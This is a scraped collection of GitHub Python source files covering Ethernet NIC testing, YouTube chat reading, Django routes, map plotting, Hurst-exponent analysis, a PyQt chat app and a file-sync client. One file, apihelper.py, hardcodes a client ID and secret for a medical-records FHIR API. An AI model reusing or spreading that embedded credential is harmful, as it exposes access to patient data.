print(time()-tiempo2)\n\n\n","repo_name":"Rhaigtz/Tarea-EDD-2018","sub_path":"Estructuras/Tree.py","file_name":"Tree.py","file_ext":"py","file_size_in_byte":5404,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"29795261994","text":"import argparse\nimport socket\nimport struct\nimport sys\nimport time\nimport datetime\nimport signal\nfrom ethtestraw_lib import (\n make_eth_header,\n get_eth_header,\n ETR_ETHER_TYPE,\n get_mac_address,\n) # noqa: E402\n\ntool_description = \"\"\"\nSimple test tool for ethernet interfaces.\nTests a ethernet NIC against a NIC on a peer machine.\nRequires the corresponding server running on the peer machine\n\"\"\"\n\nPAYLOAD_BYTES = 1500\nMAX_PACKET_SIZE = 2048 # for receive, should be a power of 2\n\nseq_number = 0\n\n\nclass Stats:\n def __init__(self):\n self.start_time = datetime.datetime.now()\n self.packets_sent = 0\n self.good_packets_received = 0\n self.error_count = 0\n\n def elapsed_seconds(self):\n elapsed = datetime.datetime.now() - self.start_time\n return elapsed.total_seconds()\n\n def bytes_per_second(self):\n return (\n self.good_packets_received * (PAYLOAD_BYTES + 14)\n ) / self.elapsed_seconds()\n\n def __str__(self):\n return (\n f\"sent pkts: {self.packets_sent:5d}, \"\n f\"errors/lost pkts: {self.error_count:3d}, \"\n f\"{self.bytes_per_second()/1e6:6.2f} 
MByte/s\"\n )\n\n\ndef update_stats(\n global_stats, interval_stats, packets_sent, packets_received, error_count\n):\n for stats in [global_stats, interval_stats]:\n stats.packets_sent += packets_sent\n stats.good_packets_received += packets_received\n stats.error_count += error_count\n\n\ndef client(args):\n global seq_number\n\n exit_code = 0\n src_mac_string = get_mac_address(args.ifname)\n src_mac = mac_address_string_to_bytes(src_mac_string)\n\n print(f\"Own Mac: Interface={args.ifname}, \" f\"{src_mac_string} dest:{args.dst_mac}\")\n s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(ETR_ETHER_TYPE))\n s.bind((args.ifname, 0))\n s.settimeout(args.timeout)\n\n global_stats = Stats()\n interval_stats = Stats()\n\n signal.signal(signal.SIGINT, signal.default_int_handler)\n\n send_seq = 0\n\n try:\n while True:\n if (\n args.runtime is not None\n and global_stats.elapsed_seconds() > args.runtime # noqa: W503\n ):\n break\n\n send_frame(src_mac, s, send_seq, args)\n\n try:\n recv_frame(src_mac, s, args)\n update_stats(global_stats, interval_stats, 1, 1, 0)\n\n except (socket.timeout, RuntimeError) as err:\n if args.verbose:\n print(f\"seq {send_seq}: Rx error: {err}\")\n update_stats(global_stats, interval_stats, 1, 0, 1)\n\n if (\n args.error_threshold != -1\n and global_stats.error_count >= args.error_threshold # noqa: W503\n ):\n print(\"Stopped because error threshold reached\")\n exit_code = 1\n break\n send_seq += 1\n\n if interval_stats.elapsed_seconds() > args.interval:\n print(interval_stats)\n interval_stats = Stats()\n\n if args.delay is not None:\n time.sleep(args.delay / 1e6)\n\n except KeyboardInterrupt:\n print(\"Stopped\")\n finally:\n print(f\"Total Stats: {global_stats}\")\n\n sys.exit(exit_code)\n\n\ndef send_frame(src_mac, s, seq_number, args):\n eth_hdr = make_eth_header(src_mac, mac_address_string_to_bytes(args.dst_mac))\n payload = make_payload(PAYLOAD_BYTES, seq_number)\n frame = eth_hdr + payload\n s.send(frame)\n\n\ndef recv_frame(src_mac, s, args):\n while True:\n # Ignore frames that are not for us. Seems to be a bug in linux stack\n pkt_bytes = s.recv(MAX_PACKET_SIZE)\n rcv_dst_mac, _, _ = get_eth_header(pkt_bytes)\n if rcv_dst_mac == src_mac:\n break\n\n validate_frame(pkt_bytes, src_mac, args)\n\n\ndef validate_frame(pkt_bytes, src_mac, args):\n global seq_number\n rcv_dst_mac, rcv_src_mac, rcv_type = get_eth_header(pkt_bytes)\n\n rcv_dst_mac_str = mac_address_bytes_to_string(rcv_dst_mac)\n rcv_src_mac_str = mac_address_bytes_to_string(rcv_src_mac)\n\n if rcv_dst_mac != src_mac:\n raise RuntimeError(\n f\"Bad dst mac {rcv_dst_mac_str} received. Expected {mac_address_bytes_to_string(src_mac)}\"\n )\n\n if rcv_src_mac_str != args.dst_mac.lower():\n raise RuntimeError(\n f\"Bad src mac {rcv_src_mac_str} received. Expected {args.dst_mac}\"\n )\n\n if rcv_type != ETR_ETHER_TYPE:\n raise RuntimeError(\n f\"Bad eth type {rcv_type} received. Expected {ETR_ETHER_TYPE}\"\n )\n\n rcv_seq_number = get_payload(pkt_bytes)[0]\n\n exp_seq_number = seq_number\n\n seq_number = rcv_seq_number + 1 # resync with sender\n\n if rcv_seq_number != exp_seq_number:\n raise RuntimeError(\n f\"Bad seq number {rcv_seq_number} received. 
Expected {exp_seq_number}\"\n )\n\n\ndef make_payload(payload_length, seq_number):\n payload_hdr = struct.pack(\"!L\", seq_number)\n payload = payload_hdr + bytes(payload_length - len(payload_hdr))\n return payload\n\n\ndef get_payload(pkt_bytes):\n return struct.unpack(\"!L\", pkt_bytes[14:18])\n\n\ndef mac_address_string_to_bytes(addr_string):\n mac_elems = addr_string.split(\":\")\n if len(mac_elems) != 6:\n raise ValueError(f\"malformed mac: ${addr_string}\")\n\n data = bytearray(6)\n for i in range(6):\n data[i] = int(mac_elems[i], 16)\n return data\n\n\ndef mac_address_bytes_to_string(addr_bytes):\n s = \"\"\n for i in range(6):\n s += \"%02x\" % addr_bytes[i]\n if i < 5:\n s += \":\"\n return s\n\n\ndef command_line_args_parsing():\n parser = argparse.ArgumentParser(description=tool_description)\n parser.add_argument(\"ifname\", help=\"Name of local interface (e.g. eth0)\")\n parser.add_argument(\"dst_mac\", help=\"Peer's MAC address (e.g. 00:11:22:33:44:55)\")\n parser.add_argument(\n \"-r\",\n \"--runtime\",\n help=\"runtime in seconds. (default: run forever)\",\n type=int,\n default=None,\n )\n parser.add_argument(\n \"-d\",\n \"--delay\",\n help=\"Delay in microseconds between pings (default: None)\",\n type=int,\n default=None,\n )\n parser.add_argument(\n \"-t\",\n \"--timeout\",\n help=\"Timeout in seconds to wait for peer reply (default: 0.1)\",\n type=float,\n default=0.1,\n )\n parser.add_argument(\n \"-e\",\n \"--error_threshold\",\n help=\"stop after n errors, -1 to stop never (default: 1)\",\n type=int,\n default=1,\n )\n parser.add_argument(\n \"-i\",\n \"--interval\",\n help=\"print statistics after x seconds (default: 0.5)\",\n type=float,\n default=0.5,\n )\n parser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"Be verbose\",\n action=\"store_true\",\n )\n return parser.parse_args()\n\n\nif __name__ == \"__main__\":\n args = command_line_args_parsing()\n client(args)\n","repo_name":"ci4rail/eth-test-raw","sub_path":"eth-test-raw-client.py","file_name":"eth-test-raw-client.py","file_ext":"py","file_size_in_byte":7031,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"44056184110","text":"from pytchat import LiveChat\nimport time\n\n\ndef read_youtube_chat(video_id, history_file, newest_chat_file):\n chat = LiveChat(video_id)\n processed_chat_messages = set() # Set to store processed chat messages\n\n while chat.is_alive():\n for c in chat.get().sync_items():\n chat_message = f\"viewer:{c.author.name} say: {c.message}\"\n if chat_message not in processed_chat_messages:\n print(chat_message)\n with open(history_file, \"a\", encoding=\"utf-8\") as file:\n file.write(\"\\n\" + chat_message)\n processed_chat_messages.add(chat_message)\n with open(newest_chat_file, \"w\", encoding=\"utf-8\") as file:\n file.write(chat_message)\n\n time.sleep(1) # Add a delay to avoid excessive API requests\n\n\nvideo_id = \"\" # you can get your video id at your youtube live url for example https://www.youtube.com/watch?v=CSdEsXa your video id is CSdEsXa\nnewest_chat_file = \"NewestChat.txt\"\nhistory_file = \"ChatHistory.txt\"\n\nwhile True:\n read_youtube_chat(video_id, history_file, newest_chat_file)\n time.sleep(1)\n","repo_name":"ZeroMirai/Waifu_AI_Vtuber","sub_path":"youtube_chat.py","file_name":"youtube_chat.py","file_ext":"py","file_size_in_byte":1134,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"30833308879","text":"from django.urls import path\nfrom 
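# Aside (illustrative sketch, not part of the eth-test-raw record above): that
# client converts MAC addresses between string and byte form by hand. The same
# round trip can be done with stdlib helpers, which the original does not use:
def mac_to_bytes(addr: str) -> bytes:
    # "00:11:22:33:44:55" -> b"\x00\x11\x22\x33\x44\x55"
    return bytes.fromhex(addr.replace(":", ""))

def bytes_to_mac(data: bytes) -> str:
    return ":".join("%02x" % b for b in data)

assert bytes_to_mac(mac_to_bytes("00:11:22:33:44:55")) == "00:11:22:33:44:55"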
django.conf import settings\nfrom django.conf.urls.static import static\nfrom django.contrib import admin\nfrom notes import views\n\n\nurlpatterns = [\n path('', views.note_list_view, name='main_list'),\n path('finished_items//', views.done_item, name='finish_item'),\n path('deleted_items//', views.delete_item, name='delete_item'),\n path('recovered_items//', views.recover_item, name='recover_item'),\n\n\n path('admin/', admin.site.urls),\n]\nif settings.DEBUG:\n urlpatterns += static(settings.STATIC_URL,\n document_root=settings.STATIC_ROOT)\n urlpatterns += static(settings.MEDIA_URL,\n document_root=settings.MEDIA_ROOT)\n","repo_name":"Raef96/NotePad_App","sub_path":"src/notepad/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"74933357950","text":"import json\nimport re\nfrom matplotlib import pyplot\nimport numpy as np\n#from collections import defaultdict\n\nwith open('ca_boundaries.json', 'r') as f:\n ca_json = json.load(f)\n#\n\n# this file really has city-level boundaries as well as \n# county, but doesn't have aggregate county data...\n#\n# build county-level tools here.\n\n# basic structure... (just of what we need)\n# dict\n# |- features (list)\n# |- |- attributes (dict; city and county information; camelcase + \"County\"\n# |- |- geometry (dict)\n# |- |- |- rings (list of connectected regions; each a list of duples of (lon, lat)\n\ncounty_dict = {}\nareas = {}\nfor geom in ca_json['features']:\n county = geom['attributes']['COUNTY']\n county = re.match('([a-zA-Z\\ ]{1,}) County', county).groups(0)[0].upper()\n if county not in county_dict:\n county_dict[county] = geom['geometry']['rings']\n areas[county] = geom['attributes']['Shape__Area']\n else:\n county_dict[county] += geom['geometry']['rings']\n areas[county] += geom['attributes']['Shape__Area']\n#\n\ndef state_map(df, colname, vmin=None, vmax=None, ax=None, cmap=pyplot.cm.viridis, popscale=False):\n vals = df[colname].values\n counties = df['COUNTY'].values\n if vmin is None:\n vmin = np.nanmin(vals)\n if vmax is None:\n vmax = np.nanmax(vals)\n if vmax==vmin:\n vmax = vmin + 1\n #\n color = lambda xx : cmap( float( (xx-vmin)/(vmax-vmin) ) )\n \n if ax is None:\n print('noax')\n returnflag = True\n fig,ax = pyplot.subplots(1,1) \n else:\n returnflag = False\n #\n \n if popscale:\n # import county population data and use it to scale down sizes of counties.\n import load_county_populations as lcp\n pops = lcp.df[2019].values\n county_areas = np.array( [areas[c] for c in lcp.df['COUNTY'].values] ) # to be continued\n scales = pops/county_areas\n scales = np.sqrt( scales/max(scales) )\n lcp.df['scales'] = scales\n #\n for c,v in zip(counties,vals):\n# print(c,v)\n for r in county_dict[c]:\n xy = np.array(r, dtype=float)\n if popscale:\n ax.plot(xy[:,0], xy[:,1], c='#999', lw=0.2, zorder=-100)\n center = np.mean(xy, axis=0)\n xy -= center\n xy *= lcp.df[lcp.df['COUNTY']==c]['scales']\n xy += center\n #\n ax.fill(xy[:,0], xy[:,1], facecolor=color(v), edgecolor=[0,0,0,0])\n# xym = np.nanmean(np.concatenate(county_dict[c]), axis=0)\n# ax.text(xym[0],xym[1],c, fontsize=8)\n #\n ax.axis('equal')\n return ax\n#\n","repo_name":"maminian/newsom_recall_map_2021","sub_path":"load_geometry.py","file_name":"load_geometry.py","file_ext":"py","file_size_in_byte":2622,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"13654210139","text":"import 
requests\n\ndef get_access_token():\n\n client_id = '216'\n client_secret = '7f90c58a2cf9e812d73973508bd23b20'\n scope = 'system/*.*'\n\n form_params = {\n 'grant_type': 'client_credentials',\n 'client_id': client_id,\n 'client_secret': client_secret,\n 'scope': scope\n }\n\n token_url = \"https://app.azaleahealth.com/fhir/R4/142442/oauth/token\"\n\n response = requests.post(token_url, data=form_params)\n response.raise_for_status()\n\n token_data = response.json()\n return token_data['access_token']\n\n\ndef get_all_patients():\n\n access_token = get_access_token()\n\n get_url = \"https://app.azaleahealth.com/fhir/R4/142442/Patient\"\n headers = { 'Authorization': f'Bearer {access_token}' }\n\n response = requests.get(get_url, headers=headers)\n response.raise_for_status()\n\n if response.status_code == 200:\n return response.json()\n else:\n print(f\"Error: {response.status_code}\")\n\ndef get_patient(id):\n \n access_token = get_access_token()\n\n get_url = f\"https://app.azaleahealth.com/fhir/R4/142442/Patient?_id={id}\"\n headers = { 'Authorization': f'Bearer {access_token}' }\n\n response = requests.get(get_url, headers=headers)\n response.raise_for_status()\n\n response_json = response.json()\n\n patient_information = {\n 'name': response_json['entry'][0]['resource']['name'][0]['text']\n }\n\n if response.status_code == 200:\n return patient_information['name']\n else:\n print(f\"Error: {response.status_code}\")","repo_name":"AustinCGause/Project-Files","sub_path":"azaleaproject/patientportal/apihelper.py","file_name":"apihelper.py","file_ext":"py","file_size_in_byte":1528,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"5808534775","text":"from brownie import accounts, config, SimpleStorage, network\n\n\ndef deploy_simple_storage():\n # brownie accounts new kovanTestNet\n account = get_account()\n #account = accounts.load(\"kovanTestNet\")\n #account = accounts[0]\n print(account)\n simple_storage = SimpleStorage.deploy({\"from\": account})\n print(simple_storage)\n stored_value = simple_storage.retrieve()\n print(stored_value)\n transaction = simple_storage.store(15, {\"from\": account})\n transaction.wait(1)\n updated_stored_value = simple_storage.retrieve()\n print(updated_stored_value)\n\n\ndef get_account():\n if network.show_active() == \"development\":\n return accounts[0]\n else:\n return accounts.load(\"kovanTestNet\")\n\n\ndef main():\n deploy_simple_storage()\n","repo_name":"Dirty-Dish/NftCarRace","sub_path":"scripts/deploy.py","file_name":"deploy.py","file_ext":"py","file_size_in_byte":770,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"70760728798","text":"import numpy as np\nimport math\nimport pandas as pd\nfrom fbm import FBM\nimport hurst\nfrom numpy import std, subtract, polyfit, sqrt, log\nfrom pro_draw import draw_y,draw_xy,log_draw_xy\nimport matplotlib.pyplot as plt\n\nfrom visibility_graph import VG,HVG\nfrom box_cover import GC\nimport networkx as nx\nfrom WCF import Generate_WCF\nimport time\n\n\n\n\ndef hurst1(ts):\n ts = list(ts)\n N = len(ts)\n if N < 20:\n raise ValueError(\"Time series is too short! 
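# Aside (illustrative sketch, not part of the apihelper.py record above): that
# module requests a fresh OAuth token on every call. A common refinement is to
# cache the token until shortly before it expires. This sketch assumes the
# token endpoint also reports a lifetime (e.g. an 'expires_in' field), which
# has not been verified against the original API:
import time

class TokenCache:
    def __init__(self, fetch, margin=30):
        self._fetch = fetch        # callable returning (token, lifetime_seconds)
        self._margin = margin      # refresh this many seconds early
        self._token = None
        self._expires_at = 0.0

    def get(self):
        if self._token is None or time.time() >= self._expires_at - self._margin:
            self._token, lifetime = self._fetch()
            self._expires_at = time.time() + lifetime
        return self._token

# Example with a stubbed fetcher standing in for the real token request:
cache = TokenCache(lambda: ("dummy-token", 3600))
assert cache.get() == "dummy-token"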
input series ought to have at least 20 samples!\")\n\n max_k = int(np.floor(N / 2))\n R_S_dict = []\n for k in range(10, max_k+1):\n R, S = 0, 0\n # split ts into subsets\n subset_list = [ts[i:i + k] for i in range(0, N, k)]\n if np.mod(N, k) > 0:\n subset_list.pop()\n # tail = subset_list.pop()\n # subset_list[-1].extend(tail)\n # calc mean of every subset\n mean_list = [np.mean(x) for x in subset_list]\n for i in range(len(subset_list)):\n cumsum_list = pd.Series(subset_list[i] - mean_list[i]).cumsum()\n R += max(cumsum_list) - min(cumsum_list)\n S += np.std(subset_list[i])\n R_S_dict.append({\"R\": R / len(subset_list), \"S\": S / len(subset_list), \"n\": k})\n\n log_R_S = []\n log_n = []\n print(R_S_dict)\n for i in range(len(R_S_dict)):\n R_S = (R_S_dict[i][\"R\"] + np.spacing(1)) / (R_S_dict[i][\"S\"] + np.spacing(1))\n log_R_S.append(np.log(R_S))\n log_n.append(np.log(R_S_dict[i][\"n\"]))\n draw_xy(log_n,log_R_S)\n Hurst_exponent = np.polyfit(log_n, log_R_S, 1)[0]\n return Hurst_exponent\n\ndef hurst2(ts):\n \"\"\"Returns the Hurst Exponent of the time series vector ts\"\"\"\n\n # create the range of lag values\n i = len(ts) // 2\n lags = range(2, i)\n # Calculate the array of the variances of the lagged differences\n tau = [sqrt(std(subtract(ts[lag:], ts[:-lag]))) for lag in lags]\n\n # use a linear fit to estimate the Hurst Exponent\n poly = polyfit(log(lags), log(tau), 1)\n\n # Return the Hurst Exponent from the polyfit output\n return poly[0]*2\n\ndef repeat_task(series,N):\n f = FBM(n=10000, hurst=0.75, length=1, method='daviesharte')\n for i in range(N):\n H, c, data = hurst.compute_Hc(f.fbm() + 10., kind='price', simplified=True)\n yield H\n\ndef repeat_by(func,N):\n all_times = func()\n for _ in range(N-1):\n count = 0\n for each in func():\n all_times[count] += each\n count += 1\n print(_)\n return [x/N for x in all_times]\n\ndef d_h_test(H=None,f=None):\n if not H:\n H = [x / 100 for x in range(1, 100)]\n fractal_d = []\n for h in H:\n if not f:\n f = FBM(n=2000, hurst=h, length=1, method='daviesharte')\n series = f.fbm()\n G = VG(series)\n #Y = nx.degree_histogram(G)\n #print(Y)\n X, Y = GC(G)\n LogXI, LogYI = [], []\n for x in X:\n LogXI.append(math.log(x))\n for y in Y:\n LogYI.append(math.log(y))\n fractal_d.append(-1 * np.polyfit(LogXI, LogYI, 1)[0])\n #print(Y)\n return fractal_d\n\nif __name__ == '__main__':\n # random_changes = 1. 
+ np.random.randn(500) / 1000.\n # f = FBM(n=5000, hurst=0.5, length=1, method='daviesharte')\n #series = hurst.random_walk(10000,proba=0.3)\n #H = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n H = [0.05*i for i in range(1,19)]\n core_n = []\n for h in H:\n f = FBM(n=1000, hurst=h, length=1, method='daviesharte')\n # series = Generate_WCF(5,h,2000)\n series = f.fbm()\n G = HVG(series)\n X,Y = GC(G)\n log_draw_xy(X,Y)\n #core_n.append(nx.k_core(G).number_of_nodes())\n #print(core_n)\n\n # X,Y = GC(G)\n # LogXI, LogYI = [], []\n # for x in X:\n # LogXI.append(math.log(x))\n # for y in Y:\n # LogYI.append(math.log(y))\n # fractal_d.append(-1 * np.polyfit(LogXI, LogYI, 1)[0])\n # X =[]\n # for i in range(1,len(H)+1):\n # X.append(i)\n # log_draw_xy(X,fractal_d)\n # fd = []\n # for h in H:\n # fd.append(2-h)\n # log_draw_xy(fd,fractal_d)\n #print(hurst1(series))\n #hurst1(list(range(1,50)))\n # print(hurst2(series))\n # H, c, data = hurst.compute_Hc(series, kind='random_walk', simplified=True)\n # print(H)\n # print(d_h_test(f=f))\n # series = np.cumprod(random_changes)\n # H = [0.1,0.2,0.3,0.4,0.5,0.6,0.7,0.8,0.9]\n #Y = repeat_by(d_h_test,100)\n #H = [x / 100 for x in range(1, 100)]\n #draw_xy(H,Y)\n","repo_name":"DvDxx/fractal_d","sub_path":"Hurst.py","file_name":"Hurst.py","file_ext":"py","file_size_in_byte":4525,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"51"} +{"seq_id":"28957305199","text":"from argparse import ArgumentParser\nimport numpy as np\nfrom model import Model\nimport json\n\n\nmodel: Model = None\n\ndef predict(data):\n \n for line in data:\n for char in line:\n image = np.clip(np.array(char, dtype=np.float64), 0, 1) * 255\n image = image.astype(np.uint8)\n if np.sum(image) <= 0.001:\n print(' ', end='')\n continue \n \n code = model.predict(image)\n \n print(chr(code), end='')\n print()\n\n\n\nif __name__ == '__main__':\n parser = ArgumentParser()\n parser.add_argument('model_path', help='a path to the image classifier model')\n parser.add_argument('json_data', help='path to json format')\n \n args = parser.parse_args()\n\n model = Model(args.model_path)\n \n f = open(args.json_data)\n data = json.load(f)\n f.close()\n\n print(\"\\n\\n\\n ############## Encoded text ##############\")\n predict(data)\n","repo_name":"pawel2000pl/AO_Project","sub_path":"letter_classification/appNoServer.py","file_name":"appNoServer.py","file_ext":"py","file_size_in_byte":971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"19899776654","text":"#this is a problem demonstrating a simple task creation app that creates a project with a deadline\r\n\r\nclass Project(object):\r\n \"\"\"docstring for Project\"\"\"\r\n def __init__(self, project_name, project_description, project_deadline):\r\n self.project_name = project_name\r\n self.project_deadline = project_deadline\r\n self.project_description = project_description\r\n\r\n\r\n#Inheritance of Project into User module\r\nclass User(Project):\r\n \"\"\"docstring for User\"\"\"\r\n def __init__(self, project_name, project_description, project_deadline, first_name, last_name):\r\n Project.__init__(self, project_name, project_description, project_deadline)\r\n self.first_name = first_name\r\n self.last_name = last_name\r\n\r\n\r\np = Project(\"ProjectOne\", \"A project about constructing a building\", \"10/03/2017\")\r\nprint(p)\r\n 
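# Aside (illustrative sketch, not part of the Hurst.py record above): both
# estimators in that file reduce to fitting a straight line through points in
# log-log space and reading the exponent off the slope. A self-contained
# illustration on an exact power law y = x**0.7 (synthetic data, not from the
# original file):
import numpy as np

x = np.arange(10, 200, 10, dtype=float)
y = x ** 0.7
slope, intercept = np.polyfit(np.log(x), np.log(y), 1)
assert abs(slope - 0.7) < 1e-9   # the fitted slope recovers the exponent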
\r\n","repo_name":"roselynemakena/andelabs","sub_path":"real_world.py","file_name":"real_world.py","file_ext":"py","file_size_in_byte":755,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"22703109039","text":"import sys\r\n\r\nfrom PyQt5.QtWidgets import QApplication, QWidget, QTabWidget, QVBoxLayout\r\n\r\nfrom GUI.Tabs.SettingsTab import Settings\r\nfrom GUI.Tabs.TextChat import TextChat\r\n\r\napp = QApplication(sys.argv)\r\n\r\n\r\nclass ChatAppMainWindow(QWidget):\r\n\r\n def __init__(self):\r\n super(QWidget, self).__init__()\r\n\r\n self.tabs = QTabWidget()\r\n self.SettingsTab = Settings(self.tabs)\r\n self.TextChatTab = TextChat(self.tabs)\r\n\r\n self.setupUI()\r\n\r\n def add_tabs(self):\r\n self.tabs.addTab(self.TextChatTab, 'TextChat')\r\n self.tabs.addTab(self.SettingsTab, 'Settings')\r\n\r\n def setupUI(self):\r\n self.setWindowTitle('TFS Chat App')\r\n self.root_layout = QVBoxLayout(self)\r\n self.root_layout.setObjectName('MainWindow_root_layout')\r\n self.add_tabs()\r\n self.root_layout.addWidget(self.tabs)\r\n\r\n with open('tfsc.css', 'r') as styles:\r\n self.setStyleSheet(styles.read())\r\n\r\n\r\npage = ChatAppMainWindow()\r\n\r\npage.show()\r\napp.exec()\r\n","repo_name":"TFSComputerScienceClub/Chat-App","sub_path":"Client/gui_launch.py","file_name":"gui_launch.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"30326173610","text":"class Fighter:\n def __init__(self, name):\n self.name = name\n self.health = 100\n self.damage = 10\n\n def attack(self, other_guy):\n other_guy.health = other_guy.health - self.damage\n print(\"{} attacks {}!\".format(self.name, other_guy.name))\n print(\"{} loses {} health points!\".format(other_guy.name, self.damage))\n\n def __str__(self):\n return \"{}: {}\".format(self.name, self.health)\n\nqazi = Fighter(\"Qazi\")\nyou = Fighter(\"Matt\")\n\nprint(qazi) # Qazi: 100\nprint(you)\n\nyou.attack(qazi)\nprint(qazi)\n","repo_name":"CleverProgrammer/cleverprogrammer_stuff","sub_path":"OOP/string_representation.py","file_name":"string_representation.py","file_ext":"py","file_size_in_byte":551,"program_lang":"python","lang":"en","doc_type":"code","stars":790,"dataset":"github-code","pt":"51"} +{"seq_id":"31904603619","text":"liczba = [2, 10, 12, 15, 20, 25, 30, 35]\nliczba2 = [5, 3460, 242, 15, 204, 2475, 3480, 385]\n\n#mapa\n\ndef funkcja(x):\n return x * x\n\nwynik = map(funkcja, liczba)\nprint(list(wynik))\n\nwynik2 = map(lambda x: x*x, liczba2)\nprint(list(wynik2))\n\n#filtry\n\nwynik3 = filter(lambda x: x % 2 == 0, liczba2) #zawsze 1 argument, wynik w postaci T/F\nprint(list(wynik3))","repo_name":"Unsimpable2/PythonLearning","sub_path":"Podstawy/mapa_filtry.py","file_name":"mapa_filtry.py","file_ext":"py","file_size_in_byte":356,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"17419039697","text":"import ROOT\nimport os\nfrom EfficiencyPlots import EfficiencyPlots, PlotInfo\n\n\n\ninputFileName = \"../../../Histos/StudyFakeRate/MuTau/W/v_5_2015-11-25/fakerates_MuTau_W.root\"\nplotDir = \"plots/\"\nname = \"IdealFakeFactors_MuTau\"\nsystems = []\nsystems.append(\"\")\n\nselectionLevels = []\nselectionLevels.append((\"StandardIso\",))\n\nreferenceLevels = []\nreferenceLevels.append((\"NoIso\",))\n\nreferenceLevels2 = []\nreferenceLevels2.append((\"InvertIso\",))\n\nnames = []\nnames.append(\"VsNoIso\")\n\nnames2 = 
[]\nnames2.append(\"VsInvertIso\")\n\nvariables = [\"mvis_vs_match5\"]\nvariableNames = {}\nvariableNames[\"mvis_vs_match5\"] = \"M_{vis} [GeV]\"\n\n\n\nplotInfos = [PlotInfo()]\nplotInfos[0].markerStyle = 20\nplotInfos[0].yTitle = \"Fake factor\" \n\nif not os.path.exists(plotDir+\"/\"+name):\n os.makedirs(plotDir+\"/\"+name)\noutputFile = ROOT.TFile.Open(plotDir+\"/\"+name+\"/\"+name+\".root\", \"RECREATE\")\n\nefficiencyPlots = []\n\neffPlots = EfficiencyPlots()\neffPlots.name = name\neffPlots.histoBaseName = \"hFakeRate\"\neffPlots.inputFileNames = [[inputFileName]]\neffPlots.systems = systems\neffPlots.selectionLevels = selectionLevels\neffPlots.plotInfos = plotInfos\neffPlots.referenceLevels = referenceLevels \neffPlots.individualNames = names\neffPlots.variables = variables\neffPlots.variableNames = variableNames\neffPlots.outputFile = outputFile\neffPlots.plot(0., 0.5)\nefficiencyPlots.append(effPlots)\n\neffPlots = EfficiencyPlots()\neffPlots.name = name\neffPlots.histoBaseName = \"hFakeRate\"\neffPlots.inputFileNames = [[inputFileName]]\neffPlots.systems = systems\neffPlots.selectionLevels = selectionLevels\neffPlots.plotInfos = plotInfos\neffPlots.referenceLevels = referenceLevels2 \neffPlots.individualNames = names2\neffPlots.variables = variables\neffPlots.variableNames = variableNames\neffPlots.outputFile = outputFile\neffPlots.divideOption = \"pois\"\neffPlots.plot(0., 0.5)\nefficiencyPlots.append(effPlots)\n\n\noutputFile.Close()\n","repo_name":"jbsauvan/H2Taus-Studies","sub_path":"FakeRate/ComputeFakeRates/plotIdealFakeFactors_MuTau.py","file_name":"plotIdealFakeFactors_MuTau.py","file_ext":"py","file_size_in_byte":1879,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"39807995778","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\n这是R File Sync的启动端\n建议编译成exe,放在环境变量中使用\n\"\"\"\n__author__ = 'Roney'\n\nfrom client import *\nimport sys\n\ndef print_help():\n info = \"\"\"\n****************** R File Sync ******************\nThis is a client and the work path can only be the current path!\nUsage: rfs.py Action [Arguments]\nAction:\n initialize: rfs.py init remote_server remote_path\n # Initialize the work path and the remote path. 
The remote path must not exist.\n test: rfs.py test\n # Test the read and write permissions of both files.\n different: rfs.py diff\n # Compare the differences between the both files.\n push: rfs.py push [y]\n # Synchronize local files to the server.\n pull: rfs.py pull [y]\n # Synchronize server files to the local.\nExplain:\n [y] stands for optional, so I recommend not using it.\n\n \"\"\"\n print(info)\n\n\ndef print_error(info,b_help=False):\n print(\"******************\\n{}\\n******************\".format(info))\n if b_help:\n print_help()\n\n\ndef print_success():\n print(\"\\n******************\\nRun success!!!\\n******************\")\n\n\nif __name__ == \"__main__\":\n if len(sys.argv) < 2:\n print_help()\n else:\n action = sys.argv[1]\n if action == \"init\":\n if len(sys.argv) == 4:\n remote_server,remote_path = sys.argv[2],sys.argv[3]\n if init(remote_server, remote_path):\n print_success()\n else:\n print_error(\"remote_server:{} remote_path:{} not init.\".format(remote_server,remote_path))\n else:\n print_error(\"Input error.\", True)\n elif action == \"test\":\n if test():\n print_success()\n else:\n print_error(\"Test error.\")\n elif action == \"diff\":\n if diff() is not None:\n print_success()\n else:\n print_error(\"Diff error.\")\n\n elif action == \"push\":\n diff_dict = diff()\n if diff_dict:\n if len(sys.argv) >= 3:\n c = sys.argv[2].upper()\n else:\n c = input(\"\\nPush [Y/y/N/n] : \").upper()\n if c == \"Y\":\n if push(diff_dict):\n print_success()\n else:\n print_error(\"Push error.\")\n else:\n print_error(\"Diff error.\")\n elif action == \"pull\":\n diff_dict = diff()\n if diff_dict:\n if len(sys.argv) >= 3:\n c = sys.argv[2].upper()\n else:\n c = input(\"\\nPush [Y/y/N/n] : \").upper()\n if c == \"Y\":\n if pull(diff_dict):\n print_success()\n else:\n print_error(\"Pull error.\")\n else:\n print_error(\"Diff error.\")\n else:\n print_error(\"Input error.\", 